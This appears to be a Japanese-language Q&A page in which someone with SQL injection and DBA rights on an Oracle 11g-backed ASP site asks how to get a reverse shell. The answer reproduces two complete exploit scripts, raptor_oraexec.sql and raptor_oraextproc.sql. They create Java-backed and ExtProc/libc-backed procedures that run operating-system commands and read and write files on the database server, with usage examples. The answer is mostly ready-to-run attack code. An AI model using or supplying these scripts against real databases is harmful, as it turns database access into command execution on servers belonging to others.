web-dev-qa-db-ja.com

Oracle SQLインジェクションリバースシェル

ASPコードを使用するWebサイトでSQLインジェクションをテストしています。すべてのデータベースとテーブルを正常に取得できます。現在のユーザーはDBA権限を持っています。どのようにしてリバースシェルを取得できますか?このSQLインジェクション。Oracleのバージョンは「Oracle Database 11g Enterprise Edition Release 11.1.0.7.0」です。

1
user1968957

Oracle DBMSでコードを実行するこの2つの方法を試すことができます。

最初はJavaコード: http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql

-- Usage example:
-- $ sqlplus "/ as sysdba"
-- [...]
-- SQL> @raptor_oraexec.sql
-- [...]
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l > /tmp/aaa');
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l / > /tmp/bbb');
-- SQL> exec dbms_Java.set_output(2000);
-- SQL> set serveroutput on;
-- SQL> exec javareadfile('/tmp/mytest');
-- /bin/ls -l > /tmp/aaa
-- /bin/ls -l / >/tmp/bbb
-- SQL> exec javacmd('/bin/sh /tmp/mytest');
-- SQL> !sh
-- $ ls -rtl /tmp/
-- [...]
-- -rw-r--r--   1 Oracle   system        45 Nov 22 12:20 mytest
-- -rw-r--r--   1 Oracle   system      1645 Nov 22 12:20 aaa
-- -rw-r--r--   1 Oracle   system      8267 Nov 22 12:20 bbb
-- [...]
--

create or replace and resolve Java source named "oraexec" as
import Java.lang.*;
import Java.io.*;
public class oraexec
{
    /*
     * Command execution module
     */
    public static void execCommand(String command) throws IOException
    {
        Runtime.getRuntime().exec(command);
    }

    /*
     * File reading module
     */
    public static void readFile(String filename) throws IOException
    {
        FileReader f = new FileReader(filename);
        BufferedReader fr = new BufferedReader(f);
        String text = fr.readLine();
        while (text != null) {
            System.out.println(text);
            text = fr.readLine();
        }
        fr.close();
    }

    /*
     * File writing module
     */
    public static void writeFile(String filename, String line) throws IOException
    {
        FileWriter f = new FileWriter(filename, true); /* append */
        BufferedWriter fw = new BufferedWriter(f);
        fw.write(line);
        fw.write("\n");
        fw.close();
    }
}
/

-- usage: exec javacmd('command');
create or replace procedure javacmd(p_command varchar2) as
language Java           
name 'oraexec.execCommand(Java.lang.String)';
/

-- usage: exec dbms_Java.set_output(2000);
--        set serveroutput on;
--        exec javareadfile('/path/to/file');
create or replace procedure javareadfile(p_filename in varchar2) as
language Java
name 'oraexec.readFile(Java.lang.String)';
/

-- usage: exec javawritefile('/path/to/file', 'line to append');
create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
language Java
name 'oraexec.writeFile(Java.lang.String, Java.lang.String)';
/

2番目はExtProcを使用しています: http://www.0xdeadbeef.info/exploits/raptor_oraextproc.sql

-- Usage example:
-- $ echo $Oracle_HOME
-- /opt/Oracle/
-- $ sqlplus "/ as sysdba"
-- [...]
-- Connected to:
-- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
-- With the Partitioning, OLAP and Oracle Data Mining options
-- JServer Release 9.2.0.1.0 - Production
-- SQL> @raptor_oraextproc.sql
-- [...]
-- exec oracmd32.exec('touch /tmp/32');
-- [...]
-- ERROR at line 1:
-- ORA-06520: PL/SQL: Error loading external library
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
-- /opt/Oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
-- ELFCLASS32
-- [...]
-- SQL> exec oracmd64.exec('touch /tmp/64');
-- SQL> !ls -l /tmp/64
-- -rw-r--r--   1 Oracle   orainst        0 Dec 19 13:49 /tmp/64
--

-- library for 32-bit Oracle releases
create or replace library exec_Shell32 as
'$Oracle_HOME/bin/../../../../../../../lib/32/libc.so.1';
/

-- library for 64-bit Oracle releases
create or replace library exec_Shell64 as
'$Oracle_HOME/bin/../../../../../../../lib/64/libc.so.1';
/

-- package for 32-bit Oracle releases
-- usage: exec oracmd32.exec('command');
create or replace package oracmd32 as
    procedure exec(cmdstring in char);
end oracmd32;
/
create or replace package body oracmd32 as
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_Shell32
    language c;
end oracmd32;
/

-- package for 64-bit Oracle releases
-- usage: exec oracmd64.exec('command');
create or replace package oracmd64 as
    procedure exec(cmdstring in char);
end oracmd64;
/
create or replace package body oracmd64 as
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_Shell64
    language c;
end oracmd64;
/
3
Cristian Dobre